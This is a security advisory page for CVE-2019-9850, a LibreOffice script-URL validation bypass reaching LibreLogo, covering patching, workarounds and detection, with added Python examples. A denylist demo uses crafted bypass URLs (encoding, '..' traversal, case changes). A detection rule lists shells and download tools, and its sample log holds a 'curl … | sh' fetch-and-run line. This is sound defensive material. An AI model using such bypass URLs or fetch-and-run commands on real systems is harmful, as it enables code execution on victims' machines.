CVE-2019-9850
📋 TL;DR
LibreOffice 6.2.5 fixed CVE-2019-9848 by refusing to let a document's script event handlers invoke the bundled LibreLogo component. That check validated the script URL insufficiently, so a crafted document could still reach LibreLogo through a script event handler and have it execute attacker-chosen Python, giving remote code execution as the user who opened the file. LibreOffice versions prior to 6.2.6 are affected.
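The bug class the advisory names, insufficient validation of a script URL, is easiest to see side by side: a checker that does a literal string match on the raw URL, and one that canonicalises the URL first and decides on the resolved library name. The following is an illustrative example added here; it is not LibreOffice's code and does not reproduce the actual CVE-2019-9850 check or the published bypass. The `vnd.sun.star.script:<Library>/<Module>.py$<function>?language=...&location=...` shape is LibreOffice's Python script URL format; the function names, the `DENIED_LIBRARIES` set and every test URL are constructed for the example, and whether any of these particular URL shapes worked against LibreOffice is not something this page establishes.

```python
"""Illustrative example (not LibreOffice's code): a denylist check on a script
URL done as a raw prefix match, beside a checker that canonicalises first.
The checker functions, DENIED_LIBRARIES and the sample URLs are constructed."""
import posixpath
from typing import List, Optional, Tuple
from urllib.parse import unquote

DENIED_LIBRARIES = {"librelogo"}   # constructed denylist; the page names only LibreLogo
SCHEME = "vnd.sun.star.script"


def naive_is_blocked(url: str) -> bool:
    """Weak pattern: case-sensitive prefix match on the raw, undecoded URL."""
    return url.startswith("vnd.sun.star.script:LibreLogo")


def canonical_library(url: str) -> Optional[str]:
    """Return the lower-cased library name a script URL resolves to, or None
    when the URL is not a vnd.sun.star.script URL at all."""
    if ":" not in url:
        return None
    scheme, rest = url.split(":", 1)
    if scheme.lower() != SCHEME:          # URI schemes are case-insensitive
        return None
    path = rest.split("?", 1)[0]          # drop the ?language=...&location=... query
    # Percent-decode until the string stops changing, so double encoding
    # (%25 in front of another escape) cannot smuggle characters past the check.
    previous = None
    while previous != path:
        previous, path = path, unquote(path)
    # Collapse "." and ".." segments the way a path resolver would.
    path = posixpath.normpath("/" + path).lstrip("/")
    first_segment = path.split("/", 1)[0]
    library = first_segment.split("$", 1)[0]   # tolerate a "Lib$func" form without a module
    return library.lower()


def hardened_is_blocked(url: str) -> bool:
    """Decide on the canonical library name, not on the raw string."""
    library = canonical_library(url)
    return library is not None and library in DENIED_LIBRARIES


def compare(urls: List[str]) -> List[Tuple[str, bool, bool]]:
    """(url, naive verdict, hardened verdict) for each input URL."""
    return [(u, naive_is_blocked(u), hardened_is_blocked(u)) for u in urls]


if __name__ == "__main__":
    # Constructed URLs: only the first carries the literal prefix the naive
    # check looks for; the next three resolve to the same library anyway.
    samples = [
        "vnd.sun.star.script:LibreLogo/LibreLogo.py$run?language=Python&location=share",
        "vnd.sun.star.script:Libre%4Cogo/LibreLogo.py$run?language=Python&location=share",
        "vnd.sun.star.script:Standard/../LibreLogo/LibreLogo.py$run?language=Python&location=share",
        "VND.SUN.STAR.SCRIPT:librelogo/LibreLogo.py$run?language=Python&location=share",
        "vnd.sun.star.script:Standard/Module1.py$main?language=Python&location=document",
    ]
    for url, naive, hardened in compare(samples):
        print(f"naive={str(naive):5} hardened={str(hardened):5} {url}")
```

The design point is that the decision must be taken on the same representation the script resolver will act on: decode, normalise and case-fold first, then compare. Any check that runs on the raw string is only as strong as the set of encodings the attacker did not think of.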
💻 Affected Systems
- LibreOffice
📦 What is this software?
LibreOffice is a free, cross-platform office suite. LibreLogo is a turtle-graphics scripting component bundled with it; its commands are translated into Python and run in LibreOffice's embedded Python interpreter, which is why reaching it from a document yields code execution. Vendor/product entries listed for this CVE:
Fedora by Fedoraproject
Leap by Opensuse
Libreoffice by Libreoffice
Ubuntu Linux by Canonical
⚠️ Risk & Real-World Impact
Worst Case
Complete system compromise through remote code execution when a user opens a malicious document, potentially leading to data theft, ransomware deployment, or persistent backdoor installation.
Likely Case
Attackers deliver malicious documents via email or downloads, exploiting user trust to execute arbitrary code on the victim's system with the user's privileges.
If Mitigated
Once the patch is applied the bypass is closed. On unpatched systems the impact is still bounded by the need for a user to open the crafted document and by that user's privileges, so user awareness reduces but does not remove the risk.
🎯 Exploit Status
Exploitation requires a user to open a crafted document; the bound script event then runs without a macro-security prompt, because LibreLogo is a script bundled with the application rather than a macro carried in the document. A public description of the bypass accompanied the disclosure (see References).
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 6.2.6 or later
Vendor Advisory: https://www.libreoffice.org/about-us/security/advisories/cve-2019-9850/
Restart Required: No system reboot; running LibreOffice instances (including the quickstarter, if enabled) must be closed and relaunched so the updated binaries are loaded.
Instructions:
1. Update LibreOffice to version 6.2.6 or later using your distribution's package manager or the official installer.
2. Linux: 'sudo apt update && sudo apt upgrade libreoffice' (Debian/Ubuntu) or the equivalent for your distribution. Distribution builds may carry the fix as a backport under an older upstream version number; confirm the fixed package version against the distribution's own advisory (DSA-4501, USN-4102-1, or the openSUSE and Fedora announcements in References).
3. Windows/macOS: download and install the latest version from libreoffice.org.
🔧 Temporary Workarounds
Remove the LibreLogo component (all platforms)
LibreLogo is an installed script under LibreOffice's own share/Scripts/python directory, not something the document carries; removing it leaves a script event handler nothing to invoke. On Debian and Ubuntu it is packaged separately as libreoffice-librelogo and can be uninstalled; on other platforms, removing the LibreLogo directory from share/Scripts/python in the installation achieves the same, where your deployment permits it.
Command: package manager or file removal; no single GUI setting.
Raise macro security (all platforms)
Tools > Options > LibreOffice > Security > Macro Security: set High or Very High and trust only documents from known sources.
Command: not applicable (GUI configuration only).
Caveat: this setting governs document macros. LibreLogo is an application-bundled script that vulnerable versions could run without a macro prompt, so treat this as defence in depth rather than a fix.
🧯 If You Can't Patch
- Application control: restrict what soffice.bin / soffice.exe may launch (shells, script hosts, download utilities). Exploitation has to leave the office process to do anything beyond the document, and that step is where it can be blocked.
- Email and download filtering: quarantine office documents that contain script event bindings (vnd.sun.star.script: URLs), which are rare in legitimate mail.
- Train users not to open unsolicited documents, and to report ones that prompt unexpected behaviour on opening.
🔍 How to Verify
Check if Vulnerable:
Compare the upstream version: as shipped by The Document Foundation, anything below 6.2.6 is vulnerable. Distribution packages may carry a backported fix under an older upstream version number, so for distro builds check the installed package version against the distribution advisory rather than the upstream number alone.
Check Version:
Linux: libreoffice --version
macOS: /Applications/LibreOffice.app/Contents/MacOS/soffice --version
Windows: Help > About LibreOffice
Verify Fix Applied:
Confirm the version is 6.2.6 or higher (or the fixed package version named in your distribution's advisory) and that every running LibreOffice instance was relaunched after the update.
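The version check above, with the distribution caveat built in, as an added example; it is not from this page's sources or from LibreOffice. Version strings can come from `libreoffice --version`, from `soffice --version`, or be typed in from Help > About. The sample strings and the list of distribution build markers are constructed; a package whose upstream version predates 6.2.6 may still carry a backported fix, so for distro builds the verdict is `check-distro-advisory`, not `vulnerable`.

```python
"""Added example (not LibreOffice's or any vendor's code): classify a
LibreOffice version string against the 6.2.6 fix for CVE-2019-9850.
Sample strings and the _DISTRO_MARKERS heuristic are constructed."""
import re
import shutil
import subprocess
from typing import Optional, Tuple

FIXED_IN = (6, 2, 6)
# Matches "LibreOffice 6.2.5.2 <hash>" and "LibreOffice 6.1.5.2 10(Build:2)" style output.
_VERSION_RE = re.compile(r"LibreOffice\s+(\d+)\.(\d+)\.(\d+)(?:\.(\d+))?")
# Markers that distribution builds tend to put in --version output (constructed heuristic).
_DISTRO_MARKERS = ("(build:", "debian", "ubuntu", "suse", "fedora")


def parse_version(text: str) -> Optional[Tuple[int, ...]]:
    """Extract (major, minor, micro[, build]) from a version string, or None."""
    m = _VERSION_RE.search(text)
    if not m:
        return None
    return tuple(int(p) for p in m.groups() if p is not None)


def is_before_fix(version: Tuple[int, ...]) -> bool:
    """Compare major.minor.micro only; a fourth component is a build number."""
    return version[:3] < FIXED_IN


def assess(version_text: str, distro_package: Optional[bool] = None) -> str:
    """'fixed', 'vulnerable', 'check-distro-advisory' or 'unknown'.

    distro_package overrides the heuristic when the caller knows how the
    binary was installed (True for a distribution package)."""
    version = parse_version(version_text)
    if version is None:
        return "unknown"
    if not is_before_fix(version):
        return "fixed"
    if distro_package is None:
        lowered = version_text.lower()
        distro_package = any(marker in lowered for marker in _DISTRO_MARKERS)
    return "check-distro-advisory" if distro_package else "vulnerable"


def installed_version_text() -> Optional[str]:
    """Run the locally installed binary, if any; None when LibreOffice is absent."""
    candidates = ("libreoffice", "soffice",
                  "/Applications/LibreOffice.app/Contents/MacOS/soffice")
    for name in candidates:
        path = shutil.which(name)
        if path:
            result = subprocess.run([path, "--version"], capture_output=True,
                                    text=True, timeout=30)
            return result.stdout or result.stderr
    return None


if __name__ == "__main__":
    # Constructed sample outputs; the hex suffix stands in for a build hash.
    for sample in ("LibreOffice 6.2.5.2 deadbeef",
                   "LibreOffice 6.2.6.2 deadbeef",
                   "LibreOffice 6.1.5.2 10(Build:2)"):
        print(f"{sample!r}: {assess(sample)}")
    local = installed_version_text()
    if local:
        print(f"installed: {local.strip()!r}: {assess(local)}")
```

Running it with no arguments prints the verdict for the constructed samples and, when a LibreOffice binary is on PATH, for the local installation; feed `assess()` the text from Help > About on hosts where the binary cannot be run from a shell.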
📡 Detection & Monitoring
Log Indicators:
- soffice.bin / soffice.exe spawning child processes it normally does not start (shells, script hosts, download utilities)
- Because LibreLogo runs inside LibreOffice's embedded Python interpreter, a separate Python process is not necessarily visible; key on what the office process itself spawns rather than on a python child
Network Indicators:
- LibreOffice making unexpected outbound connections shortly after a document is opened
SIEM Query:
Process creation where the parent image ends in soffice.bin or soffice.exe and the child image is a shell, script host or download utility (cmd.exe, powershell.exe, sh, bash, curl, wget, and similar), or any child outside the small set LibreOffice legitimately starts (for example xdg-open for hyperlinks)
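The rule just described, run over constructed process-creation events, as an added example that is not from this page's sources or any vendor. The event shape (JSON with ts, host, parent_image, image, cmdline) is made up for the example and is not a Sysmon or auditd schema; map the field names to your own telemetry. The allowlist of expected children and the suspicious-child set are starting points to tune per fleet.

```python
"""Added example (not from the page or any vendor): flag soffice spawning
shells, script hosts or download utilities. Event schema, allowlists and the
sample log lines are all constructed for this example."""
import json
import posixpath
from typing import Dict, Iterable, List

OFFICE_PARENTS = {"soffice.bin", "soffice.exe", "soffice"}
# Shells, script hosts and download utilities a document has no business launching.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe",
    "sh", "bash", "dash", "zsh", "python", "python3", "perl", "curl", "wget", "nc",
}
# Children LibreOffice legitimately starts (constructed allowlist; tune per fleet).
EXPECTED_CHILDREN = {"soffice.bin", "oosplash", "xdg-open", "senddoc", "senddoc.exe"}


def basename(path: str) -> str:
    """Last path component, lower-cased, for both Windows and POSIX paths."""
    return posixpath.basename(path.replace("\\", "/")).lower()


def classify(event: Dict) -> str:
    """'high', 'medium' or 'none' for one process-creation event."""
    if basename(event.get("parent_image", "")) not in OFFICE_PARENTS:
        return "none"
    child = basename(event.get("image", ""))
    if child in SUSPICIOUS_CHILDREN:
        return "high"
    if child not in EXPECTED_CHILDREN:
        return "medium"          # unknown child: review, then allowlist or escalate
    return "none"


def detect(lines: Iterable[str]) -> List[Dict]:
    """Parse JSON event lines and return one alert per suspicious event."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        severity = classify(event)
        if severity != "none":
            alerts.append({
                "severity": severity,
                "host": event.get("host"),
                "ts": event.get("ts"),
                "parent": event.get("parent_image"),
                "child": event.get("image"),
                "cmdline": event.get("cmdline"),
            })
    return alerts


# Constructed sample events (raw string so the JSON backslash escapes survive).
SAMPLE_LOG = r"""
{"ts":"2019-08-15T09:12:01Z","host":"ws01","parent_image":"/usr/lib/libreoffice/program/soffice.bin","image":"/usr/bin/xdg-open","cmdline":"xdg-open https://example.invalid/"}
{"ts":"2019-08-15T09:12:07Z","host":"ws02","parent_image":"C:\\Program Files\\LibreOffice\\program\\soffice.exe","image":"C:\\Windows\\System32\\cmd.exe","cmdline":"cmd.exe /c calc.exe"}
{"ts":"2019-08-15T09:12:09Z","host":"ws03","parent_image":"/usr/lib/libreoffice/program/soffice.bin","image":"/bin/sh","cmdline":"sh -c 'curl -s http://203.0.113.10/s | sh'"}
{"ts":"2019-08-15T09:12:11Z","host":"ws04","parent_image":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\cmd.exe","cmdline":"cmd.exe"}
{"ts":"2019-08-15T09:12:15Z","host":"ws05","parent_image":"/opt/libreoffice6.2/program/soffice.bin","image":"/usr/local/bin/convert-helper","cmdline":"convert-helper /tmp/report.odt"}
"""

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(f"[{alert['severity']}] {alert['host']} {alert['ts']} "
              f"{alert['parent']} -> {alert['child']} :: {alert['cmdline']}")
```

On the constructed sample, ws02 and ws03 are flagged high (a shell under soffice), ws05 medium (an unknown child worth a look), and ws01 and ws04 produce nothing: xdg-open is how LibreOffice opens hyperlinks on Linux, and explorer.exe is not an office parent. The medium tier is deliberate; every fleet has a few legitimate helpers, and the cheapest way to find them is to let the rule surface them once.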
🔗 References
- http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00006.html
- http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00067.html
- https://lists.debian.org/debian-lts-announce/2019/10/msg00005.html
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PMEGUWMWORC3DOVEHVXLFT3A5RSCMLBH/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WVSDPZJG3UA43X3JXRHJAWXLDZEW77LM/
- https://seclists.org/bugtraq/2019/Aug/28
- https://usn.ubuntu.com/4102-1/
- https://www.debian.org/security/2019/dsa-4501
- https://www.libreoffice.org/about-us/security/advisories/CVE-2019-9850